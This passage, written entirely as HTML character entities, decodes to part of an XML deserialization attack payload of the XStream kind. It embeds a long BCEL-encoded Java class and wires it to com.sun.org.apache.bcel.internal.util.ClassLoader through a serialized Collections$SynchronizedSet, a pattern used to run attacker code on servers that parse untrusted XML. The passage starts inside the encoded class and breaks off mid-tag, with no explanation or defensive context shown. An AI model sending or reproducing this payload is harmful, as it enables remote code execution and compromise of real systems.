&#x24;&#x73;&#x77;&#x24;&#x62;&#x37;&#x24;&#x79;&#x24;&#x37;&#x62;&#x24;&#x33;&#x64;&#x24;&#x39;&#x31;&#x33;&#x24;&#x69;&#x24;&#x39;&#x37;&#x24;&#x39;&#x62;&#x24;&#x38;&#x39;&#x39;&#x24;&#x33;&#x64;&#x24;&#x39;&#x66;&#x24;&#x62;&#x31;&#x24;&#x66;&#x34;&#x75;&#x24;&#x65;&#x65;&#x24;&#x53;&#x24;&#x39;&#x32;&#x75;&#x24;&#x38;&#x36;&#x35;&#x24;&#x56;&#x24;&#x65;&#x62;&#x24;&#x63;&#x38;&#x49;&#x24;&#x61;&#x38;&#x5f;&#x24;&#x65;&#x31;&#x24;&#x65;&#x65;&#x24;&#x61;&#x38;&#x67;&#x24;&#x64;&#x62;&#x24;&#x64;&#x63;&#x74;&#x67;&#x24;&#x66;&#x39;&#x24;&#x7a;&#x24;&#x38;&#x66;&#x24;&#x33;&#x62;&#x24;&#x24;&#x24;&#x38;&#x31;&#x24;&#x56;&#x24;&#x65;&#x65;&#x24;&#x39;&#x33;&#x39;&#x24;&#x63;&#x64;&#x24;&#x35;&#x63;&#x49;&#x24;&#x38;&#x65;&#x24;&#x65;&#x36;&#x34;&#x24;&#x63;&#x37;&#x51;&#x24;&#x62;&#x31;&#x24;&#x42;&#x53;&#x42;&#x24;&#x64;&#x64;&#x24;&#x6b;&#x24;&#x66;&#x62;&#x24;&#x63;&#x61;&#x24;&#x64;&#x32;&#x24;&#x67;&#x24;&#x64;&#x37;&#x24;&#x35;&#x64;&#x24;&#x38;&#x32;&#x24;&#x61;&#x62;&#x24;&#x63;&#x32;&#x42;&#x24;&#x35;&#x65;&#x24;&#x63;&#x35;&#x24;&#x7a;&#x24;&#x64;&#x38;&#x24;&#x77;&#x24;&#x69;&#x24;&#x64;&#x38;&#x64;&#x24;&#x37;&#x62;&#x24;&#x64;&#x33;&#x24;&#x65;&#x36;&#x4e;&#x24;&#x64;&#x65;&#x32;&#x24;&#x6a;&#x24;&#x33;&#x65;&#x24;&#x61;&#x31;&#x24;&#x65;&#x39;&#x5a;&#x24;&#x39;&#x36;&#x24;&#x64;&#x30;&#x24;&#x62;&#x39;&#x24;&#x66;&#x30;&#x24;&#x75;&#x24;&#x6f;&#x24;&#x56;&#x24;&#x39;&#x62;&#x24;&#x64;&#x38;&#x52;&#x24;&#x62;&#x31;&#x24;&#x38;&#x64;&#x24;&#x64;&#x37;&#x24;&#x71;&#x44;&#x24;&#x65;&#x38;&#x24;&#x63;&#x63;&#x79;&#x24;&#x64;&#x62;&#x70;&#x39;&#x24;&#x65;&#x39;&#x24;&#x6c;&#x24;&#x4b;&#x24;&#x39;&#x63;&#x24;&#x67;&#x56;&#x72;&#x24;&#x39;&#x37;&#x24;&#x6e;&#x24;&#x38;&#x34;&#x24;&#x39;&#x37;&#x38;&#x59;&#x24;&#x64;&#x61;&#x24;&#x72;&#x24;&#x74;&#x66;&#x24;&#x35;&#x63;&#x24;&#x64;&#x62;&#x30;&#x57;&#x24;&#x71;&#x24;&#x62;&#x30;&#x59;&#x24;&#x62;&#x65;&#x24;&#x63;&#x63;&#x6d;&#x24;&#x6e;&#x6c;&#x24;&#x65;&#x64;&#x24;&#x64;&#x33;&#x24;&#x48;&#x75;&#x24;&#x61;&#x64;&#x77;&#x24;&#x62;&#x30;&#x47;&#x24;&#x65;&#x33;&#x24;&#x44;&#x24;&#x64;&#x61;&#x24;&#x34;&#x30;&#x24;&#x62;&#x37;&#x24;&#x64;&#x36;&#x24;&#x61;&#x62;&#x24;&#x66;&#x37;&#x24;&#x66;&#x35;&#x24;&#x66;&#x33;&#x24;&#x38;&#x31;&#x6c;&#x24;&#x62;&#x66;&#x24;&#x64;&#x65;&#x24;&#x62;&#x37;&#x24;&#x64;&#x63;&#x24;&#x64;&#x66;&#x24;&#x64;&#x66;&#x24;&#x64;&#x64;&#x24;&#x39;&#x62;&#x24;&#x72;&#x6c;&#x24;&#x61;&#x66;&#x24;&#x65;&#x33;&#x24;&#x4e;&#x24;&#x38;&#x61;&#x30;&#x70;&#x24;&#x65;&#x32;&#x24;&#x62;&#x39;&#x46;&#x24;&#x24;&#x24;&#x39;&#x39;&#x24;&#x64;&#x31;&#x35;&#x24;&#x64;&#x33;&#x24;&#x65;&#x34;&#x36;&#x24;&#x63;&#x33;&#x24;&#x39;&#x62;&#x24;&#x77;&#x24;&#x64;&#x65;&#x24;&#x63;&#x32;&#x24;&#x64;&#x62;&#x24;&#x77;&#x24;&#x64;&#x65;&#x24;&#x63;&#x31;&#x24;&#x62;&#x62;&#x24;&#x77;&#x24;&#x64;&#x65;&#x24;&#x63;&#x33;&#x24;&#x66;&#x62;&#x24;&#x4d;&#x24;&#x6c;&#x24;&#x61;&#x38;&#x24;&#x66;&#x38;&#x24;&#x51;&#x24;&#x6c;&#x24;&#x38;&#x39;&#x24;&#x39;&#x63;&#x24;&#x37;&#x65;&#x24;&#x79;&#x24;&#x61;&#x31;&#x24;&#x65;&#x32;&#x24;&#x63;&#x36;&#x24;&#x38;&#x38;&#x24;&#x38;&#x61;&#x4f;&#x24;&#x66;&#x30;&#x24;&#x61;&#x39;&#x24;&#x38;&#x61;&#x24;&#x63;&#x66;&#x24;&#x66;&#x30;&#x24;&#x62;&#x39;&#x24;&#x38;&#x61;&#x24;&#x5f;&#x24;&#x66;&#x30;&#x24;&#x61;&#x35;&#x24;&#x45;&#x24;&#x61;&#x38;&#x24;&#x66;&#x38;&#x24;&#x4b;&#x5f;&#x4b;&#x68;&#x24;&#x64;&#x38;&#x24;&#x63;&#x33;&#x34;&#x24;&#x62;&#x65;&#x24;&#x61;&#x64;&#x24;&#x66;&#x33;&#x24;&#x62;&#x63;&#x6b;&#x58;&#x24;&#x61;&#x36;&#x24;&#x38;&#x61;&#x6f;&#x24;&#x51;&#x24;&#x61;&#x37;&#x24;&#x38;&#x61;&#x53;&#x69;&#x24;&#x71;&#x24;&#x62;&#x34;&#x24;&#x65;&#x63;&#x24;&#x76;&#x24;&#x64;&#x38;&#x24;&#x37;&#x63;&#x39;&#x47;&#x79;&#x4a;&#x4e;&#x71;&#x77;&#x24;&#x64;&#x35;&#x24;&#x63;&#x61;&#x4a;&#x68;&#x24;&#x24;&#x24;&#x58;&#x4d;&#x24;&#x59;&#x24;&#x33;&#x63;&#x24;&#x39;&#x37;&#x24;&#x7a;&#x24;&#x38;&#x39;&#x74;&#x6e;&#x24;&#x64;&#x35;&#x24;&#x61;&#x36;&#x24;&#x66;&#x30;&#x24;&#x65;&#x39;&#x24;&#x38;&#x32;&#x24;&#x65;&#x38;&#x24;&#x38;&#x35;&#x24;&#x62;&#x32;&#x24;&#x65;&#x63;&#x24;&#x64;&#x32;&#x24;&#x38;&#x64;&#x24;&#x66;&#x31;&#x24;&#x66;&#x36;&#x24;&#x66;&#x34;&#x24;&#x61;&#x33;&#x5a;&#x24;&#x63;&#x33;&#x24;&#x53;&#x24;&#x39;&#x61;&#x44;&#x24;&#x42;&#x24;&#x7a;&#x24;&#x64;&#x33;&#x24;&#x65;&#x35;&#x24;&#x64;&#x62;&#x6e;&#x50;&#x24;&#x61;&#x63;&#x24;&#x62;&#x34;&#x55;&#x24;&#x63;&#x38;&#x24;&#x35;&#x64;&#x24;&#x61;&#x63;&#x44;&#x24;&#x37;&#x64;&#x24;&#x39;&#x66;&#x48;&#x24;&#x64;&#x38;&#x24;&#x69;&#x24;&#x75;&#x24;&#x61;&#x30;&#x24;&#x64;&#x63;&#x24;&#x65;&#x37;&#x68;&#x24;&#x54;&#x70;&#x24;&#x71;&#x24;&#x62;&#x34;&#x24;&#x63;&#x35;&#x24;&#x64;&#x33;&#x24;&#x38;&#x66;&#x66;&#x24;&#x37;&#x66;&#x24;&#x62;&#x38;&#x24;&#x63;&#x63;&#x24;&#x65;&#x33;&#x70;&#x24;&#x61;&#x31;&#x24;&#x35;&#x65;&#x24;&#x62;&#x62;&#x24;&#x66;&#x31;&#x24;&#x35;&#x64;&#x38;&#x24;&#x63;&#x30;&#x24;&#x65;&#x36;&#x7a;&#x24;&#x39;&#x39;&#x24;&#x63;&#x64;&#x24;&#x37;&#x65;&#x24;&#x5f;&#x24;&#x61;&#x35;&#x24;&#x5a;&#x24;&#x6f;&#x77;&#x55;&#x24;&#x38;&#x36;&#x24;&#x62;&#x39;&#x69;&#x24;&#x61;&#x64;&#x24;&#x64;&#x33;&#x24;&#x33;&#x64;&#x24;&#x6c;&#x24;&#x64;&#x61;&#x24;&#x65;&#x66;&#x24;&#x61;&#x62;&#x70;&#x24;&#x64;&#x66;&#x4a;&#x24;&#x37;&#x63;&#x24;&#x56;&#x59;&#x24;&#x65;&#x64;&#x24;&#x65;&#x35;&#x24;&#x79;&#x24;&#x65;&#x61;&#x24;&#x52;&#x24;&#x39;&#x31;&#x24;&#x39;&#x33;&#x42;&#x24;&#x59;&#x24;&#x4e;&#x24;&#x65;&#x35;&#x69;&#x24;&#x6d;&#x24;&#x38;&#x35;&#x24;&#x67;&#x52;&#x24;&#x63;&#x38;&#x78;&#x79;&#x6e;&#x24;&#x65;&#x62;&#x24;&#x46;&#x24;&#x61;&#x64;&#x24;&#x33;&#x61;&#x24;&#x61;&#x32;&#x24;&#x63;&#x37;&#x38;&#x24;&#x52;&#x36;&#x24;&#x63;&#x66;&#x24;&#x57;&#x24;&#x78;&#x24;&#x64;&#x32;&#x24;&#x66;&#x35;&#x24;&#x39;&#x38;&#x24;&#x66;&#x38;&#x4b;&#x24;&#x4b;&#x24;&#x75;&#x24;&#x35;&#x63;&#x24;&#x33;&#x61;&#x24;&#x64;&#x63;&#x24;&#x6a;&#x24;&#x64;&#x31;&#x75;&#x24;&#x65;&#x65;&#x38;&#x46;&#x24;&#x64;&#x30;&#x24;&#x64;&#x66;&#x24;&#x61;&#x31;&#x24;&#x66;&#x38;&#x24;&#x61;&#x32;&#x24;&#x65;&#x38;&#x24;&#x66;&#x66;&#x4a;&#x24;&#x66;&#x32;&#x24;&#x79;&#x24;&#x65;&#x31;&#x24;&#x64;&#x34;&#x24;&#x42;&#x24;&#x63;&#x31;&#x24;&#x69;&#x24;&#x38;&#x38;&#x24;&#x35;&#x63;&#x71;&#x24;&#x35;&#x63;&#x24;&#x63;&#x64;&#x76;&#x24;&#x39;&#x64;&#x79;&#x24;&#x63;&#x33;&#x24;&#x35;&#x64;&#x24;&#x61;&#x35;&#x32;&#x24;&#x6a;&#x24;&#x45;&#x61;&#x71;&#x24;&#x66;&#x37;&#x46;&#x24;&#x48;&#x24;&#x64;&#x63;&#x59;&#x24;&#x63;&#x66;&#x74;&#x24;&#x38;&#x64;&#x24;&#x4e;&#x24;&#x33;&#x61;&#x4e;&#x24;&#x61;&#x31;&#x73;&#x24;&#x6b;&#x24;&#x53;&#x4d;&#x24;&#x72;&#x41;&#x24;&#x58;&#x24;&#x64;&#x39;&#x24;&#x61;&#x32;&#x56;&#x24;&#x38;&#x65;&#x24;&#x62;&#x37;&#x24;&#x65;&#x34;&#x24;&#x55;&#x24;&#x68;&#x24;&#x61;&#x39;&#x24;&#x76;&#x24;&#x33;&#x65;&#x24;&#x64;&#x39;&#x24;&#x35;&#x65;&#x24;&#x65;&#x65;&#x24;&#x39;&#x65;&#x70;&#x24;&#x66;&#x33;&#x6d;&#x24;&#x61;&#x65;&#x24;&#x64;&#x33;&#x24;&#x71;&#x79;&#x4c;&#x24;&#x66;&#x38;&#x33;&#x24;&#x62;&#x36;&#x24;&#x72;&#x62;&#x24;&#x6a;&#x24;&#x24;&#x41;&#x53;&#x64;&#x52;&#x57;&#x24;&#x54;&#x24;&#x39;&#x61;&#x49;&#x33;&#x24;&#x65;&#x66;&#x24;&#x62;&#x39;&#x64;&#x24;&#x63;&#x39;&#x24;&#x62;&#x35;&#x24;&#x4e;&#x24;&#x62;&#x61;&#x24;&#x66;&#x39;&#x24;&#x62;&#x62;&#x24;&#x38;&#x38;&#x24;&#x61;&#x38;&#x24;&#x64;&#x33;&#x24;&#x66;&#x37;&#x24;&#x4a;&#x24;&#x63;&#x38;&#x24;&#x62;&#x63;&#x24;&#x72;&#x24;&#x37;&#x65;&#x24;&#x61;&#x30;&#x24;&#x34;&#x30;&#x24;&#x65;&#x34;&#x4e;&#x24;&#x66;&#x35;&#x24;&#x69;&#x24;&#x33;&#x65;&#x24;&#x63;&#x36;&#x73;&#x24;&#x63;&#x36;&#x46;&#x61;&#x32;&#x24;&#x66;&#x63;&#x24;&#x48;&#x24;&#x61;&#x34;&#x24;&#x66;&#x64;&#x24;&#x64;&#x64;&#x4d;&#x24;&#x33;&#x65;&#x24;&#x64;&#x39;&#x24;&#x61;&#x61;&#x24;&#x65;&#x36;&#x4c;&#x53;&#x43;&#x24;&#x45;&#x43;&#x24;&#x39;&#x38;&#x24;&#x53;&#x24;&#x57;&#x32;&#x24;&#x44;&#x24;&#x61;&#x32;&#x24;&#x62;&#x34;&#x24;&#x38;&#x33;&#x24;&#x6b;&#x46;&#x24;&#x69;&#x24;&#x64;&#x65;&#x24;&#x53;&#x24;&#x61;&#x33;&#x24;&#x65;&#x37;&#x5f;&#x24;&#x64;&#x32;&#x4d;&#x30;&#x6a;&#x24;&#x66;&#x33;&#x24;&#x62;&#x34;&#x75;&#x24;&#x38;&#x33;&#x71;&#x24;&#x33;&#x64;&#x67;&#x6b;&#x24;&#x33;&#x61;&#x24;&#x63;&#x37;&#x49;&#x24;&#x39;&#x63;&#x24;&#x61;&#x32;&#x24;&#x61;&#x37;&#x45;&#x24;&#x66;&#x63;&#x24;&#x71;&#x24;&#x66;&#x61;&#x24;&#x64;&#x33;&#x24;&#x55;&#x24;&#x61;&#x36;&#x24;&#x62;&#x35;&#x24;&#x39;&#x64;&#x24;&#x38;&#x38;&#x24;&#x65;&#x66;&#x51;&#x24;&#x38;&#x35;&#x6a;&#x24;&#x65;&#x32;&#x24;&#x66;&#x65;&#x75;&#x24;&#x65;&#x36;&#x24;&#x6b;&#x24;&#x61;&#x34;&#x24;&#x66;&#x62;&#x24;&#x61;&#x38;&#x24;&#x66;&#x30;&#x51;&#x24;&#x5a;&#x24;&#x4e;&#x24;&#x66;&#x39;&#x24;&#x49;&#x24;&#x61;&#x37;&#x24;&#x33;&#x62;&#x24;&#x61;&#x32;&#x55;&#x24;&#x39;&#x35;&#x24;&#x33;&#x66;&#x24;&#x38;&#x31;&#x24;&#x66;&#x39;&#x24;&#x39;&#x30;&#x24;&#x61;&#x37;&#x24;&#x33;&#x61;&#x24;&#x72;&#x24;&#x64;&#x61;&#x45;&#x24;&#x37;&#x63;&#x24;&#x75;&#x24;&#x64;&#x33;&#x24;&#x35;&#x64;&#x24;&#x33;&#x65;&#x24;&#x61;&#x61;&#x24;&#x37;&#x64;&#x24;&#x61;&#x38;&#x24;&#x64;&#x31;&#x24;&#x67;&#x24;&#x6c;&#x24;&#x38;&#x37;&#x52;&#x24;&#x61;&#x31;&#x58;&#x24;&#x38;&#x38;&#x34;&#x6b;&#x63;&#x24;&#x6e;&#x24;&#x65;&#x32;&#x24;&#x64;&#x36;&#x24;&#x61;&#x35;&#x24;&#x63;&#x32;&#x24;&#x62;&#x31;&#x30;&#x24;&#x4a;&#x24;&#x61;&#x33;&#x24;&#x66;&#x35;&#x45;&#x24;&#x61;&#x33;&#x54;&#x55;&#x24;&#x61;&#x63;&#x24;&#x77;&#x24;&#x57;&#x24;&#x24;&#x24;&#x64;&#x61;&#x24;&#x66;&#x64;&#x24;&#x38;&#x32;&#x68;&#x24;&#x38;&#x61;&#x24;&#x4a;&#x24;&#x64;&#x62;&#x68;&#x43;&#x24;&#x38;&#x38;&#x24;&#x63;&#x34;&#x24;&#x4c;&#x24;&#x39;&#x35;&#x24;&#x64;&#x31;&#x24;&#x63;&#x36;&#x24;&#x38;&#x63;&#x24;&#x64;&#x30;&#x24;&#x39;&#x31;&#x63;&#x72;&#x24;&#x58;&#x31;&#x24;&#x6f;&#x24;&#x63;&#x34;&#x68;&#x24;&#x63;&#x61;&#x24;&#x45;&#x7a;&#x24;&#x38;&#x64;&#x24;&#x61;&#x39;&#x48;&#x24;&#x79;&#x24;&#x53;&#x24;&#x33;&#x64;&#x24;&#x65;&#x63;&#x24;&#x61;&#x33;&#x24;&#x66;&#x39;&#x36;&#x24;&#x47;&#x24;&#x37;&#x66;&#x44;&#x24;&#x63;&#x62;&#x24;&#x63;&#x32;&#x24;&#x37;&#x64;&#x24;&#x63;&#x34;&#x62;&#x24;&#x39;&#x31;&#x24;&#x62;&#x61;&#x56;&#x24;&#x6c;&#x47;&#x24;&#x37;&#x63;&#x24;&#x69;&#x24;&#x66;&#x35;&#x24;&#x66;&#x31;&#x24;&#x63;&#x34;&#x24;&#x33;&#x64;&#x24;&#x69;&#x24;&#x38;&#x62;&#x24;&#x6b;&#x24;&#x66;&#x37;&#x71;&#x24;&#x6f;&#x24;&#x61;&#x35;&#x24;&#x63;&#x34;&#x58;&#x4c;&#x24;&#x66;&#x31;&#x24;&#x64;&#x31;&#x7a;&#x24;&#x68;&#x24;&#x64;&#x35;&#x24;&#x65;&#x32;&#x24;&#x37;&#x62;&#x24;&#x66;&#x32;&#x24;&#x4f;&#x24;&#x63;&#x32;&#x24;&#x64;&#x31;&#x24;&#x74;&#x24;&#x37;&#x64;&#x24;&#x33;&#x63;&#x75;&#x24;&#x48;&#x72;&#x24;&#x62;&#x61;&#x24;&#x63;&#x33;&#x47;&#x24;&#x64;&#x62;&#x24;&#x35;&#x64;&#x24;&#x4b;&#x30;&#x24;&#x38;&#x34;&#x24;&#x48;&#x24;&#x66;&#x38;&#x24;&#x39;&#x64;&#x24;&#x35;&#x65;&#x24;&#x62;&#x39;&#x24;&#x4b;&#x24;&#x39;&#x63;&#x24;&#x61;&#x31;&#x24;&#x51;&#x24;&#x5f;&#x24;&#x64;&#x33;&#x24;&#x62;&#x62;&#x24;&#x74;&#x46;&#x62;&#x24;&#x49;&#x24;&#x38;&#x37;&#x50;&#x24;&#x38;&#x37;&#x5a;&#x24;&#x69;&#x24;&#x61;&#x35;&#x24;&#x62;&#x35;&#x24;&#x4e;&#x24;&#x66;&#x35;&#x24;&#x65;&#x38;&#x24;&#x72;&#x24;&#x66;&#x65;&#x24;&#x51;&#x24;&#x67;&#x30;&#x24;&#x6f;&#x24;&#x35;&#x65;&#x53;&#x34;&#x41;&#x24;&#x63;&#x33;&#x61;&#x78;&#x68;&#x24;&#x61;&#x36;&#x39;&#x24;&#x64;&#x61;&#x24;&#x38;&#x32;&#x24;&#x65;&#x66;&#x70;&#x24;&#x45;&#x77;&#x49;&#x24;&#x66;&#x33;&#x24;&#x42;&#x4e;&#x24;&#x39;&#x30;&#x24;&#x61;&#x37;&#x63;&#x24;&#x66;&#x38;&#x24;&#x44;&#x24;&#x63;&#x37;&#x24;&#x66;&#x31;&#x24;&#x74;&#x24;&#x72;&#x24;&#x62;&#x33;&#x24;&#x38;&#x33;&#x24;&#x33;&#x63;&#x24;&#x61;&#x64;&#x24;&#x6e;&#x24;&#x62;&#x63;&#x24;&#x38;&#x33;&#x5f;&#x51;&#x24;&#x63;&#x64;&#x24;&#x64;&#x30;&#x24;&#x63;&#x39;&#x24;&#x64;&#x30;&#x24;&#x63;&#x35;&#x24;&#x39;&#x30;&#x24;&#x36;&#x30;&#x48;&#x32;&#x74;&#x24;&#x48;&#x24;&#x78;&#x24;&#x65;&#x64;&#x24;&#x39;&#x66;&#x24;&#x4a;&#x24;&#x64;&#x36;&#x24;&#x6b;&#x46;&#x24;&#x66;&#x65;&#x24;&#x72;&#x24;&#x61;&#x32;&#x76;&#x24;&#x49;&#x24;&#x63;&#x66;&#x24;&#x66;&#x66;&#x50;&#x24;&#x61;&#x64;&#x24;&#x49;&#x24;&#x61;&#x38;&#x24;&#x39;&#x65;&#x24;&#x6a;&#x24;&#x63;&#x32;&#x4c;&#x56;&#x24;&#x39;&#x64;&#x24;&#x63;&#x30;&#x45;&#x24;&#x38;&#x36;&#x24;&#x62;&#x33;&#x24;&#x6e;&#x24;&#x62;&#x32;&#x24;&#x65;&#x64;&#x24;&#x61;&#x33;&#x24;&#x54;&#x24;&#x78;&#x24;&#x64;&#x30;&#x24;&#x66;&#x66;&#x24;&#x50;&#x24;&#x63;&#x61;&#x24;&#x64;&#x32;&#x24;&#x61;&#x35;&#x24;&#x35;&#x65;&#x55;&#x24;&#x49;&#x24;&#x41;&#x24;&#x41;&#x0a;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x61;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6f;&#x75;&#x74;&#x65;&#x72;&#x2d;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6e;&#x61;&#x6d;&#x65;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x6f;&#x72;&#x43;&#x4c;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x73;&#x75;&#x6e;&#x2e;&#x6d;&#x69;&#x73;&#x63;&#x2e;&#x4c;&#x61;&#x75;&#x6e;&#x63;&#x68;&#x65;&#x72;&#x24;&#x45;&#x78;&#x74;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x32;&#x63;&#x65;&#x72;&#x74;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x68;&#x61;&#x73;&#x68;&#x74;&#x61;&#x62;&#x6c;&#x65;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x65;&#x73;&#x20;&#x64;&#x65;&#x66;&#x69;&#x6e;&#x65;&#x64;&#x2d;&#x69;&#x6e;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x6c;&#x61;&#x6e;&#x67;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x44;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x6c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x2f;&#x2e;&#x2e;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x72;&#x69;&#x6e;&#x63;&#x69;&#x70;&#x61;&#x6c;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x68;&#x61;&#x73;&#x41;&#x6c;&#x6c;&#x50;&#x65;&#x72;&#x6d;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x68;&#x61;&#x73;&#x41;&#x6c;&#x6c;&#x50;&#x65;&#x72;&#x6d;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x61;&#x74;&#x69;&#x63;&#x50;&#x65;&#x72;&#x6d;&#x69;&#x73;&#x73;&#x69;&#x6f;&#x6e;&#x73;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x73;&#x74;&#x61;&#x74;&#x69;&#x63;&#x50;&#x65;&#x72;&#x6d;&#x69;&#x73;&#x73;&#x69;&#x6f;&#x6e;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6b;&#x65;&#x79;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6b;&#x65;&#x79;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x44;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x3e;&#x0a;&#x3c;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x73;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x22;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x24;&#x53;&#x79;&#x6e;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x53;&#x65;&#x74;&#x22;&#x20;&#x73;&#x65;&#x72;&#x69;&#x61;&#x6c;&#x69;&#x7a;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x22;&#x63;&#x75;&#x73;&#x74;&#x6f;&#x6d;&#x22;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x5f;&#x2d;&#x53;&#x79;&#x6e